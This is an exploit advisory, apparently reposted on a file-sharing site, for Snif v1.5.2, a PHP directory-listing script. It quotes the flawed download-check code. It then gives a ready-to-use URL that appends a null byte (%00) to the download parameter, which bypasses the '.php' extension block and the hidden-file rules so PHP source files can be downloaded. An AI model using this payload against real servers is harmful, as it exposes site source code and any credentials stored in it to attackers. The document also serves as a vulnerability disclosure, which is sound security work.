Snif v1.5.2 Any Filetype Download Exploit by h3m4n

VIEWS: 393 PAGES: 2

									                                      Snif v1.5.2 Any Filetype Download Exploit            Page 1/2
  1    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  2    −: Snif − "Any Filetype" Download Exploit :−
  3    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  4
  5    Script     :   Snif − (Simple And Nice Index File)
  6    Version    :   1.5.2 (possibly lower versions too)
  7    Found By   :   Aodrulez.
  8    Email      :   f3arm3d3ar[at]gmail.com
  9
  10   Vulnerability:
  11   −−−−−−−−−−−−−−
  12
  13   Some Default Settings are:
  14
  15   $hiddenFilesWildcards = Array("*.php", "*~");
  16   $allowPHPDownloads = false;
  17
  18   The first option will prevent any php file
  19   from being listed in the directory listing.
  20   Second one will prevent download of files
  21   with ".php" extension.
  22
  23   Even with these options set,we can still
  24   download php files....due to the following
  25   vulnerable code:−
  26
  27   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  28   if ($_GET["download"]!="") {
  29
  30    $download = stripslashes($_GET["download"]);
  31    $filename = safeDirectory($path.rawurldecode($download));
  32    if (
  33           !file_exists($filename)
  34           OR fileIsHidden($filename)
  35           OR (substr(strtolower($filename), −4)==".php" AND !$allowPHPDownloads)) {
  36
  37
  38   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  39
  40   The last line in the above code checks the
  41   file’s extension to make sure its not a php
  42   file.This line of code is Vulnerable though
  43
  44   Exploit:
  45   −−−−−−−−
  46
  47   Lets say the script is located here:
  48   http://www.a.com/snif.php
  49
  50   The following url will bypass all restrictions
  51   and let you download a php file :−
  52

Aodrulez                                                                                   02/01/2010
                                   Snif v1.5.2 Any Filetype Download Exploit   Page 2/2
  53   http://www.a.com/snif.php?download=snif.php%00
  54
  55
  56   Greetz Fly Out To
  57   −−−−−−−−−−−−−−−−−
  58
  59   Amforked()                : My Mentor.
  60   The Blue Genius       : My Boss.
  61   www.orchidseven.com
  62   www.isac.org.in




Aodrulez                                                                       02/01/2010

								
To top